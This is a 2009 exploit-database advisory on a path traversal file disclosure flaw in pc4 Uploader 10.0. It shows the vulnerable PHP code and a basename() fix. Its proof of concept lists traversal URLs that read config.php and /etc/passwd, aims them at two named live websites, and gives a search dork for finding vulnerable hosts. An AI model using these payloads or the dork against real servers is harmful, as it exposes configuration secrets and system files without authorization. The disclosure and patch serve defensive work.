[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
# Published : 2009-06-22
# Author : Qabandi
# Previous Title : MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling Vulnerability
# Next Title : phpDatingClub 3.7 Remote SQL/XSS Injection Vulnerabilities


||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ__
                                        __/QQQ/````````````````QQQ___
                                      _/QQQQQ/                  QQQQQQ
                                     /QQQQ/``                    ```QQQQ
                                    /QQQQ/ Advisory                 QQQQ
                                   |QQQQ/    By      Qabandi         QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ       iqa[a]hotmail.fr     /QQQQ|
                                    QQQQ                      __  /QQQQ/
                                     QQQQ                    /QQ_QQQQ/
                                      QQQQ                   QQQQQQQ/
                                       QQQQQ                 /QQQQQ/_
                                        ``QQQQQ_____________/QQQ/QQQQ_
                                           ``QQQQQQQQQQQQQQQQQQQ/  `QQQQ
                                              ```````````````````     `````

=Vuln:		pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
=INFO:		http://pc4arb.com/article-48.html
=BUY:  		~~~
=Download:      ~~~
=DORK:		intext:"Pictures of Whale Penis"

                                  ____________
                              _-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````

none

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./pc4uploader/upfiles/index.php"

function displayimage( $fn, $lastMod, $fs )
{
    global $out_Types;
    $ext = explode( ".", $fn );
    $ext_i = count( $ext ) - 1;
    $file_ext = $ext[$ext_i];
    header( "Last-Modified: ".$lastMod );
    header( "ETag: ".getetag( $fn ) );
    header( "Accept-Ranges: bytes" );
    header( "Content-Length: ".$fs );
    header( "Content-Type: ".$out_Types[$file_ext] );
    $fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken
    if ( function_exists( fpassthru ) )
    {
        fpassthru( $fp );
    }
    else
    {
        $temp = fread( $fp, $fs );
        echo $temp;
    }
    fclose( $fp );
    return;
}

// Function displayimage() is later called

$file = $_GET['file']; <---------------------------------// again, not filtered or anything.
//..
//..
//..
//..
    displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````

http://localhost/pc4uploader/upfiles/index.php?file=../config.php
http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd

demo:

http://upload.traidnt.net/upfiles/index.php?file=../config.php
{Save File to view the code if needed}

http://uploader.pc4arb.com/upfiles/index.php?file=../config.php
{view source}



---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````

//Use this displayimage() function instead, notice the changes..

function displayimage( $fn, $lastMod, $fs )
{
    global $out_Types;
    $fn = basename($fn); 
    $ext = explode( ".", $fn );
    $ext_i = count( $ext ) - 1;
    $file_ext = $ext[$ext_i];
    header( "Last-Modified: ".$lastMod );
    header( "ETag: ".getetag( $fn ) );
    header( "Accept-Ranges: bytes" );
    header( "Content-Length: ".$fs );
    header( "Content-Type: ".$out_Types[$file_ext] );
    $fp = fopen( $fn, "rb" );
    if ( function_exists( fpassthru ) )
    {
        fpassthru( $fp );
    }
    else
    {
        $temp = fread( $fp, $fs );
        echo $temp;
    }
    fclose( $fp );
    return;
}

//I added    $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php"
// since config.php doesent exist the script will do the rest by giving a safe error,
// also move ./include/default.gif to ./upfiles/default.gif
// everything should be good :)

---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              
|         Tem al-tableegh 3an el-thaghra min sinat yaddi 	               |
______________________________________________________________________________/
                                 No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# www.Syue.com [2009-06-22]